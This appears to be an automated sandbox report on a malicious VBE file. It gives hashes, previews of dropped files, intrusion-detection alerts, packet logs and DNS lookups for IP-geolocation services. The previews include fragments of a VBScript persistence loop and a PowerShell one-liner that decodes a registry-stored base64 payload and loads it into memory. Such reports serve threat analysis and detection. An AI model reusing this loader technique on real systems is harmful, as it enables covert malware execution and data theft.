                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9.......9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.710479057510546
                                                            Encrypted:false
                                                            SSDEEP:96:mjLlyt33CxH9hkvhkvCCtweI78H3eI7HHb:mjZcyd9weVeA
                                                            MD5:792AC76E1C8402DC4F63248BD1CA20A2
                                                            SHA1:3570CA2FB92312B16BD399F5C4B85397BBAD46F1
                                                            SHA-256:CD551C1CAAD95CBBE6D68E19AEFD77D5C2E4A84A53AFC71DA55EC123300E7A16
                                                            SHA-512:7BBAFF9323432051FECC4FD5745F5F0B235F55698E1E1F48D03B2BA656211B0B7FE96346E5D58831131438F52BB31077C8A078CEA737F06CA006250F8DAB1DA8
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9.......9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6221
                                                            Entropy (8bit):3.706719549561189
                                                            Encrypted:false
                                                            SSDEEP:96:+LlMtZ3CXq9hkvhkvCCtweI7HH3eI7HHb:+Z+Wy9weueA
                                                            MD5:4DCDD2AADF3BE4263F3EC1637168B442
                                                            SHA1:257A558C1477271EBEF294CE2707D60C0C79CE6A
                                                            SHA-256:5915EF158BC0D0039894FF598CF65376D168E18B2B5820A6E23B2AEFD674E0B7
                                                            SHA-512:2BEC1EB935A69E9C668836E15421A92031084E9D2DE31B4A52B21C959FC2F5B2F849CB9695F6CD1D9B9358A207A8FC3E686EE41B076D5F54E46864E93CE6947D
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ...-/.v......5..9..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....A la.9...I..9......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^rY\e...........................%..A.p.p.D.a.t.a...B.V.1.....rYhe..Roaming.@......CW.^rYhe..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^rY`e..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^rY.e..........................A.-.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^rY.e....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^rY.e....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^rY.e..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^rY.e....Q...........
                                                            Process:C:\Windows\System32\wscript.exe
                                                            File Type:ISO-8859 text
                                                            Category:dropped
                                                            Size (bytes):2012
                                                            Entropy (8bit):5.1116490090109
                                                            Encrypted:false
                                                            SSDEEP:48:9+rGQafYxl6hzjj0BWIudnXt9gVOSQngjHVVIdojnWgCmgVF:9+Sn7x/0MVYVOZg78dknQmgVF
                                                            MD5:0DCB03776DA0B1EC5F4418221CD9152E
                                                            SHA1:1D32D1E386C46FA6DBA8522C2A99C3FF272B6CDA
                                                            SHA-256:63373B65D80F24467F6D2FC10F33965BD40450F45068FDF7293928F52DD3DC20
                                                            SHA-512:325B25EACB4E06A40605ECDCF99BD96B39CFCBA9FAB430C855E953B4630A54FBE611D2365E1F7F71785FD65E9CD2ABA247287EDD3F0FED37A667169A906DC64B
                                                            Malicious:false
                                                            Preview:Option Explicit..' Nombre del proyecto: pcPseOUmXnpEaeF.' Variables globales.Dim ABC, DEF, GHI.Set ABC = CreateObject("WScript.Shell").DEF = ABC.ExpandEnvironmentStrings("%windir%")..' Programa principal.Call JKL().Call MNO()..' Inicializaci.n de los par.metros del programa.Sub JKL(). GHI = 0.End Sub..' Rutina principal para gestionar la ejecuci.n del programa.Sub MNO(). Do While GHI < 10000 ' L.mite de iteraciones para demostraci.n. PQR(). WScript.Sleep 10000. GHI = GHI + 1. Loop.End Sub..' Procedimiento para verificar e iniciar PowerShell si es necesario.Sub PQR(). If Not STU(ABC.RegRead("HKEY_CURRENT_USER\Software\pcPseOUmXnpEaeF\i")) Then. VWX(). . Dim YZA. Set YZA = BCD(). . If Not YZA Is Nothing Then. EFG(YZA). End If. End If.End Sub..' Funci.n para verificar si un proceso espec.fico est. en ejecuci.n.Function STU(NOP). Dim HIJ, KLM. Set HIJ = GetObject("winmgmts:\\.\root\cimv2")
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                            Category:dropped
                                                            Size (bytes):1494
                                                            Entropy (8bit):4.423978372785347
                                                            Encrypted:false
                                                            SSDEEP:24:Ei/tvNa2V269+IzphSjeKm3uSmcHqgxOAX4WLeX4WgeX4WgeX4WneX4WueX4WEef:EdWxZzpsyXOAX+X5XpXKX/XFXoXQXDX5
                                                            MD5:5C12740F85D91A751DF931A739F19CC5
                                                            SHA1:E03884BE6FD309C9E2260CC409D3BE3EF2F9102E
                                                            SHA-256:98A7E86A2614FE6B99A9D24A1DBA751BE3F177947AE0F5165F5888F665F2297B
                                                            SHA-512:40507BDD361FCA4104632CAA40A1A1400D4902F2FBA470160EF25B649E0D00489A04A34E71191B77F86D138196DBEC5382D961952A15857B0ED5F33CB41AF058
                                                            Malicious:false
                                                            Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCu.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\pcPseOUmXnpEaeF'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'pcPseOUmXnpEaeF'.[33m).[33m.[45m.[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .
                                                            File type:data
                                                            Entropy (8bit):3.873141167934975
                                                            TrID:
                                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                            • MP3 audio (1001/1) 32.22%
                                                            • Lumena CEL bitmap (63/63) 2.03%
                                                            • Corel Photo Paint (41/41) 1.32%
                                                            File name:Ref#150062.vbe
                                                            File size:10'108 bytes
                                                            MD5:2874840f439a79083be1cb832dbd10f4
                                                            SHA1:e121f6fd96b75bc492c4a463c9d03d273d658f1b
                                                            SHA256:491e3f2d6ee7add3f362046c59a5ff7f8a292119b762d2b1f3174a283d41393d
                                                            SHA512:4fe2bfa046ca55e2adc4c179277ae7df351d398e3ea8e8b23d51531d9d403c8e4a471e4cb0d0fbd7b05319874190ac6455666510229562042bd112d7ddb4d65a
                                                            SSDEEP:192:nP0x+IjcaP76sgeumS8ZHSuWBDlpOxGRMVeLF+k8HZK:8oyn6sg5mNZHSxBhp4GRYk8A
                                                            TLSH:24220244CDD980D0F32566C60BCDD7E25B2FAA302B0F49D31E509296276FAC1E92AF35
                                                            File Content Preview:..#.@.~.^.p.B.M.A.A.A.=.=.v.,.1.G.s.P.9.E.P.a.D.K.%.+.D.P.l.P.a.m.K.d...r.j.s.p.x.a.2.l...o.@.#.@.&.@.#.@.&.}.w.O.k.G.U.,.2.a.w.^.r.m.b.Y.@.#.@.&.@.#.@.&.B.~.R. .O.~.s.K.U.1.Y.r.K.x.k.P.N...P.1.G.x.7.+.../.b.W.U.~._.2.(.,.n.Y.,.:.l...r.2.E.^.l.D.k.G.x.~.[
                                                            Icon Hash:68d69b8f86ab9a86
                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                            2024-11-18T13:44:23.322025+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49883 | 193.122.6.168 | 80 | TCP
                                                            2024-11-18T13:44:30.337620+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49883 | 193.122.6.168 | 80 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
                                                            Nov 18, 2024 13:43:01.628237009 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628248930 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628269911 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628314972 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628326893 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628424883 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628426075 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628631115 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628674984 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628689051 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628703117 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628746986 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.628747940 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.628958941 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629000902 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629007101 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629019976 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629051924 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629055023 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629354954 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629400015 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629403114 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629414082 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629458904 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629626036 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629676104 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629687071 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629720926 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.629723072 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.629766941 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.630076885 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.630088091 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.630124092 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747256041 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747339964 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747355938 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747370005 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747381926 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747395992 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747421026 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747476101 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747476101 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747641087 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747682095 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747709990 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747725010 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.747797966 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747811079 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.747843981 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748111963 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748123884 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748136997 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748157978 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748182058 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748334885 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748357058 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748368979 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748399019 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748456955 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748469114 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748498917 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748857021 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748897076 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748900890 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.748909950 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.748951912 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.749109030 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.749164104 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.749206066 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867003918 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867047071 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867064953 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867089033 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867100000 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867101908 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867115021 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867131948 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867149115 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867177963 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867188931 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867221117 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867243052 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867309093 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867351055 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867360115 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867372036 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867413044 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867448092 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867460966 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867471933 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867499113 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867826939 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867880106 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867885113 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867898941 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867939949 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:01.867973089 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867986917 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.867999077 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:01.868037939 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:02.004076004 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:02.009617090 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:02.256324053 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:02.306307077 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:07.392915010 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:07.392995119 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:07.395422935 CET4973080192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:07.400291920 CET8049730144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:11.715672970 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:11.721014023 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:11.721141100 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:11.721355915 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:11.726912975 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:12.774035931 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:12.784064054 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:12.784209967 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.125910997 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.126266956 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.131124973 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.131225109 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.131273031 CET8049731144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.131362915 CET4973180192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.131473064 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.136298895 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991144896 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991180897 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991195917 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991210938 CET8049732144.91.79.54192.168.2.4
                                                            Nov 18, 2024 13:43:13.991287947 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:13.991349936 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:43:16.146226883 CET4973280192.168.2.4144.91.79.54
                                                            Nov 18, 2024 13:44:22.164302111 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:22.169222116 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:22.169301033 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:22.169620037 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:22.174422026 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.024297953 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.032669067 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:23.037662029 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.277934074 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.299393892 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:23.299474001 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:23.299748898 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:23.310167074 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:23.310204983 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:23.322025061 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:23.515419006 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:23.515479088 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:24.129654884 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.129753113 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.140805006 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.140831947 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.141144991 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.196966887 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.340946913 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.383328915 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.478779078 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.478857040 CET44349889188.114.96.3192.168.2.4
                                                            Nov 18, 2024 13:44:24.478908062 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:24.681183100 CET49889443192.168.2.4188.114.96.3
                                                            Nov 18, 2024 13:44:30.042268991 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:30.047431946 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:30.289416075 CET8049883193.122.6.168192.168.2.4
                                                            Nov 18, 2024 13:44:30.313124895 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:30.318278074 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:30.318358898 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:30.337620020 CET4988380192.168.2.4193.122.6.168
                                                            Nov 18, 2024 13:44:31.160269022 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.160506010 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.165551901 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.343144894 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.344428062 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.349576950 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.524661064 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.524997950 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.529823065 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.722270012 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.722564936 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.729398012 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.912738085 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:31.913013935 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:31.917990923 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.096177101 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.097791910 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.102757931 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.277010918 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.277651072 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277728081 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277754068 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277776957 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.277796984 CET49932587192.168.2.4162.254.34.31
                                                            Nov 18, 2024 13:44:32.282905102 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.282953024 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.283010006 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.283039093 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.283067942 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.470141888 CET58749932162.254.34.31192.168.2.4
                                                            Nov 18, 2024 13:44:32.525125980 CET49932587192.168.2.4162.254.34.31
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 13:44:22.144922972 CET | 56020 | 53 | 192.168.2.4 | 1.1.1.1
Nov 18, 2024 13:44:22.152060986 CET | 53 | 56020 | 1.1.1.1 | 192.168.2.4
Nov 18, 2024 13:44:23.289596081 CET | 64074 | 53 | 192.168.2.4 | 1.1.1.1
Nov 18, 2024 13:44:23.298178911 CET | 53 | 64074 | 1.1.1.1 | 192.168.2.4
Nov 18, 2024 13:44:30.299009085 CET | 59294 | 53 | 192.168.2.4 | 1.1.1.1
Nov 18, 2024 13:44:30.312438965 CET | 53 | 59294 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 13:44:22.144922972 CET | 192.168.2.4 | 1.1.1.1 | 0x1429 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:23.289596081 CET | 192.168.2.4 | 1.1.1.1 | 0x9dc9 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
